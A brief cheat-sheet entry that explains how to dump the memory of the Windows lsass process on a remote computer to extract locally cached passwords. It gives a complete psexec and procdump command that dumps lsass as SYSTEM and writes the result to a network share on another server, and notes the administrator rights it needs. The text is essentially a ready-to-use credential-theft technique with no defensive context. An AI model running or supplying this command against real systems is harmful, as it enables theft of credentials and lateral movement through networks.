Outputting memory dump of Windows security sessions. (Obtaining passwords stored locally in cache). This can be run against a remote system to obtain password credential information. This requires “local administrator” rights on the remote PC being targeted.
psexec \\computername -accepteula -s -c procdump -accepteula -ma -o lsass.exe \\server\logs\computername.log